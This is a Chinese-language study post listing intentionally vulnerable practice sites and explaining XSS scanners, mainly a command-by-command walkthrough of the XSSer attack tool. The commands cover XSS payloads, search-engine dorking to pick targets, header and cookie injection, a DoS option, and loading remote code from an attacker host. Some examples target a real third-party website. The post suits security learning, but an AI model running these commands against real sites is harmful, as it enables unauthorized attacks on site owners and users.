那个broken web application 后续会慢慢研究的。。。先把工作任务完成。。
工作任务1:搜索类似演示网站
http://code.google.com/p/websecurify/wiki/DemoSites工作任务2:检索XSS自动化扫描工具,开源,了解检测原理
=================================================================
(一 )工作任务1:搜索类似演示网站
示例网站:http://code.google.com/p/websecurify/wiki/DemoSites
Details
The following websites may be used to compare Websecurify with other automated web application security testing tools:
- http://demo.testfire.net
- http://testphp.vulnweb.com
- http://testasp.vulnweb.com
- http://testaspnet.vulnweb.com
- http://zero.webappsecurity.com
- http://crackme.cenzic.com
- http://www.webscantest.com
S.No. | Vulnerable Application | Platform | Remark |
1 | SPI Dynamics (live) | ASP | 漏扫厂商的缺陷demo站点,想学习还是可以玩的。有新花样最好本地玩吧,除非你是活雷锋。 |
2 | Cenzic (live) | PHP | 同1 |
3 | Watchfire (live) | ASPX | 同1 |
4 | Acunetix 1 (live) | PHP | 同1 |
5 | Acunetix 2 (live) | ASP | 同1 |
6 | Acunetix 3 (live) | ASP.Net | 同1 |
7 | PCTechtips Challenge (live) | online hack challenge, just for fun | |
8 | Damn Vulnerable Web Application | PHP/MySQL | 有提供Live CD版,适合懒人 |
9 | Mutillidae | PHP | 针对OWASP的Top 10名单设置针对性的缺陷供你耍,必须推荐 |
10 | The Butterfly Security Project | PHP | |
11 | Hacme Casino | Ruby on Rails | Hacme系列is copyright by McAfee, but toooooooooooold! take it as you will and at your own risk. |
12 | Hacme Bank 2.0 | ASP.NET (2.0) | 同上,不解释。 |
13 | Updated HackmeBank | ASP.NET (2.0) | 链接失效?我没用过。 |
14 | Hacme Books | J2EE | 还是Hacme。。。 |
15 | Hacme Travel | C++ (application client-server) | 又是Hacme。。。不过这个是C++的,比较少见。也许有价值,我没用过 |
16 | Hacme Shipping | ColdFusion MX 7, MySQL | ColdFusion平台的,有针对性的可以搭建一下试试,我没用过 |
17 | OWASP WebGoat | JAVA | 适合教学 |
18 | OWASP Vicnum | PHP, Perl | |
19 | OWASP InsecureWebApp | JAVA | |
20 | OWASP SiteGenerator | ASP.NET | |
21 | Moth | ||
22 | Stanford SecuriBench | JAVA | |
23 | SecuriBench Micro | JAVA | |
24 | BadStore | Perl(CGI) | |
25 | WebMaven/Buggy Bank (very old) | ||
26 | EnigmaGroup (live) | ||
27 | XSS Encoding Skillsx5s (Casaba Watcher) | Fiddler的扩展,辅助XSS漏洞挖掘(多种字符编码转换支持) | |
28 | Google Gruyere(live) (previously Jarlsberg) | 可以在线玩,GAE supported. So, if you are in CH1N4, you may need a VPN or proxy to access it. | |
29 | Exploit- DB | Multi-platform | 最真实的Web App漏洞资料库,totally damn real!看上哪个,直接官网下载对应缺陷版本,本地想怎么玩就怎么玩。 |
30 | exploit-kb-vulnerable-web-app | PHP/MySQL | 文档清晰,易部署,有Vmware Image版,适合懒人 |
“猪在笑”推荐几个手工的辅助工具,个人感觉挺好~
Tool | Category | Remark | Similar |
paros | HTTP代理/HTTP协议调试/spider | 最新开源版3.2.13更新于2006年,后续版本已经完全商业化。但工具的易用性、功能在今天来看都是值得推荐的。支持HTTP协议双向数据查看/修改/过滤是其亮点。 | burp proxy ,Fiddler, live http headers (Firefox addon),Firebug (Many browsers’ addon) |
HackBar | 手工SQL注入辅助 | 方便转码、编码、填充垃圾字符,绕过滤必备 | |
TamperData | HTTP请求参数控制 | 拦截HTTP/HTTPS请求,允许手工修改HTTP请求参数(GET参数、POST字段、cookie等)后再提交 | |
Groundspeed | 客户端安全措施半自动化解除 | 自动检测隐藏表单字段、去除表单验证等,免去自己通过Firebug修改html代码的麻烦 | |
BuiltWith (Chrome扩展) | 网站架构自动分析 | 自动检测和识别当前浏览网站所采用的技术架构,脚本小子的最爱 | |
Google 检索到一份整理好的渗透测试学习资源列表
by http://www.pulog.org/Resources/2242/Pentesting-Vulnerable/
Web Pentesting
War Games
Application Name | Company / Developer | URL |
Hell Bound Hackers | Hell Bound Hackers | http://hellboundhackers.org/ |
Vulnerability Assessment | Kevin Orrey | http://www.vulnerabilityassessment.co.uk/ |
Smash the Stack | Smash the Stack | http://www.smashthestack.org/ |
Over the Wire | Over the Wire | http://www.overthewire.org/wargames/ |
Hack This Site | Hack This Site | http://www.hackthissite.org/ |
Hacking Lab | Hacking Lab | https://www.hacking-lab.com/ |
We Chall | We Chall | https://www.wechall.net/ |
REMnux | REMnux | http://zeltser.com/remnux/ |
Insecure Distributions
Application Name | Company / Developer | URL |
Damm Vulnerable Linux | DVL | http://www.damnvulnerablelinux.org/ |
Metasploitable | Offensive Security | http://blog.metasploit.com/2010/05/introducing-metasploitable.html |
de-ICE | Hacker Junkie | http://www.de-ice.net/ |
Moth | Bonsai SecuritySoftware | http://www.bonsai-sec.com/en/research/moth.php |
PwnOS | Niel Dickson | http://www.neildickson.com/os/ |
Holynix | Pynstrom | http://pynstrom.net/holynix.php |
(二)工作任务2:XSS自动化扫描器系统原理
RatProxy 可偵測到的漏洞包括 Cross-site Scripting (XSS, 跨網站指令碼)、指令碼惡意置入(script inclusion issues), 惡意網頁內容(content serving problems), insufficient XSRF 以及 XSS 防護(XSS defenses) 等。
- 1) 运行脚本后,会在本地启动一个代理服务器,默认端口是 8080 ;
- 2) 浏览器设置这个地址 ([url]http://localhost:8080[/url])为 代理地址 ;
- 3) 浏览要测试的 Web 页面,进行实际登录,填写表单等操作(这些动作会被代理服务器捕捉并做点"手脚"发给待检测的页面),ratproxy 会在后台记录相关的 Log ;
- 4) 用 ratproxy 提供的工具解析 Log 并输出 <acronym title="HyperText" markup="" language "="" style="padding: 0px; margin: 0px; ">HTML 进行分析;
- 5) 修正比较严重的问题后,跳回到第一步,直到评估通过为止。
$ sudo apt-get install libssl-dev openssl
$ cd ratproxy ; make
$ ./ratproxy -v . -w foo.log -d foo.com -lfscm
Sample Usage
- Launch Visual Studio
- Open a solution containing at least on C#, J# or VB.NET project
- Build the solution
- Click on Tools | XSSDetect Code Analysis, the Summary View dockable tool window activates
- Verify/edit the current settings (click on General Settings, Rules or Target Assemblies on the toolbar of the Summary View)
- Start the code analysis (use the Analyze button on the toolbar)
- After the analysis is complete, the Summary View tool window shows the results, and the output window shows information and error messages
- Double click on a result item in the Summary View to activate the Detail View
- In the Detail View, double click on a dataflow item to display the corresponding source line
- Use the "Previous" and "Next" buttons in the Detail View to display other result items
(三)研究XSSer系统运行原理
XSSer runs on many platforms. It requires Python and the following libraries:
- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip
XSSer(超强XSS攻击利器)使用说明中文版
VMware安装虚拟机Ubuntu的时候,安装完毕后是命令行模式,得重启后才能进入图形界面。
=======================================================================
XSSer 安装与测试
1. Installation 安装python相关组件
XSSer runs on many platforms. It requires Python and the following libraries:- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library
在Ubuntu下用这个指令就能够安装后所有的要用到python模块:
- sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip
2.下载XSSer相应的包并且安装
下载地址:http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download
下载后用以下指令:
安装:
- tar xzvf xsser-1.6_all.deb.tar.gz
- sudo dpkg -i xsser-1.6_all.deb
以GTK模式(也就是图形化模式运行)(GTK mode):
- xsser --gtk --silent
- $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
3.XSSer语法的掌握 (官网写的是 python xsser.py -u "http://www.baidu.com",我用的xsser -u "http://www.baidu.com",都行)
- xsser -i url.txt --proxy "http://127.0.0.1:8118" --referer 666.666.666.666
(3)使用Cem(Character Encoding Mutations 字符编码基因突变),使用user-agent,设置超时时间,设置线程数
- xsser -u "http://www.baidu.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
Ps1:Cem就是先用Hex编码,再转为Str编码,然后再转为Hex编码!
(first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding)
Ps2:user-agent 也就是用户代理,这个域放置了一些信息如OS版本,CPU类型,浏览器版本,浏览器渲染引擎,浏览器语言,浏览器语言等,可以被web服务器获取,这里我们不想被web服务器获取,所以就设置了下“XSSer!!!”就好啦~~
(4)从文件读取(-i "urls.txt"),装载自己的代码(--payload ' ' ),并且用JS中的Unescape()函数解码(--Une)
- xsser -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
- getURL("javascript:someFunction()")
2)SWF文件或者包含该文件的web页面被包含在本地受信任的沙箱中
满足上述条件就能够用:
- --payload 'eval(getURL("javascript:alert('XSS!!!')"))'
思考2:--Une为什么要用到这里?Unescape()函数对escape()函数编码过后的字符串进行解码,如果字符串不是编码后的字符串,则会把字符串原封不动的返回。也就是说,字符串被浏览器编码后送到web服务器吗?escape()一般用于脚本向某个页面如a.php这个URL传递参数时编码,可是我用的是XSSer,它在传递参数的时候会编码吗?
这两个问题等我以后深入了解再回来回答。
(5)指定引擎并且从引擎的返回结果作为target URL--XSSer Storm
- xsser --De "duck" -d "search.php?"
Ps1: duckduckgo是一个网站,搞搜索引擎的 "duck"。
Ps2: -d DORK 把搜索结果作为攻击的目标URL ( Process search engine dork results as target urls)
Ps3: --De=DORK_ENGINE 指定用到的引擎 for dorking 有这么多:(bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, google, etc.)
(6)指定抓取URL的深度和数量
--Cw=CRAWLER_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
- xsser -c 3 --Cw=4 -u "http://www.baidu.com"
(7)Post数据(Simple injection from URL, using POST, with statistics results)
- xsser -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
思考:这个-s到底有什么用呢?统计数据?Post数据一般就是把数据封装到表单中然后发到web服务器请求。
回答:这个-s其实和post没关系,就是把数据给统计了:
===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration: 0:00:05.929196
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 1 | 404: 0 | 503: 0 | Others: 1
Connec: 50 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 0
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)
===========================================================================
(8)Get请求 八进制编码(--Doo) 结果以简短URL形式(--short tinyurl)
- xsser -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
(9)Shadow DOM XSS攻击,跨站Cookie注入,最终代码FinalRemote(--Fr)
- xsser -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
Ps2:DOM XSS 攻击原理
Ps3:DOM shadow space (no server logging!) 这个DOM阴影空间貌似在哪里听过?可是就是找不到相关资料。。。终于google到了这篇文章,它讲的是Shadow DOM
什么是Shadow Dom?可能会给你带来点帮助。。。
(10) Dos(拒绝服务攻击) 网址压缩is.gd
- xsser -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
Ps:根据官方介绍,Is.gd 至今已处理了近 900 万个网址。首页非常简洁,输入需要压缩的网址提交即可。生成缩略网址后系统会计算压缩前后的字符串长度,并给出压缩率。
如果想要让用户预览网页,而不是直接发送缩略网址(有助于用户了解所链接到的网址,防止被钓鱼),只需在缩略网址后添加连接字符 “-” 来开启网页预览功能。
例如,芒果的网址 http://www.mangguo.org 经过压缩后为 http://is.gd/Aqdn,网页预览地址为 http://is.gd/Aqdn-。
注意:缩略网址 URL 中字母区分大小写。
XSSer结果会多了这么一行:
- [/] Shortered URL (Injection): http://is.gd/eAxg3x
(11) 在这些地方注入参数变量: HTTP USer-Agent,HTTP Referer , Cookie parameters
- xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
Ps1: --Xsa XSA - Cross Site Agent Scripting
Ps2: --Xsr XSR - Cross Site Referer Scripting
(12) 创建一个假的XSS代码嵌入图像(create a false image with XSS code embedded)
- xsser --imx "test.png" --payload "!enter your malicious injection code here!"
- xsser --imx "test.jpg" --payload "<script>alert('XSS')</script>"
(13)把积极的结果输出到指定的XML文件中(Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file).
- xsser -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
(14)把我们的扫描结果上传到某些网站上(twitter)这个功能真的是有爱啊~,不吐槽了。。
- xsser -d "login.php" --De "duck" --tweet
(15)创建一个swf电影注入XSS代码(Create a .swf movie with XSS code injected)
- xsser --fla "name_of_file.swf" --payload "<script>alert('XSS!!!');</script>"
(16) 发送一个hash值,预先看看目标URL是否重复全部内容(send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved)
- xsser -u "http://www.baidu.com" --hash
- Checker: looks like your target(s) does not repeat all received code.
回答:不懂~真心不懂~等以后的我深入了解了再研究吧~
(17) Data Control Protocal(DCP) 数据控制协议 注入,这个好偏门的感觉
- xsser -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
(18)META标签中的Base64编码(RFC2397),也是很偏门的感觉
- xsser -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
- --B64 B64 - Base64 code encoding in META tag (rfc2397)
(19)启动浏览器,结束时发现的每个XSS(launch a browser at the end with each XSS discovered)
- xsser -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
- Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly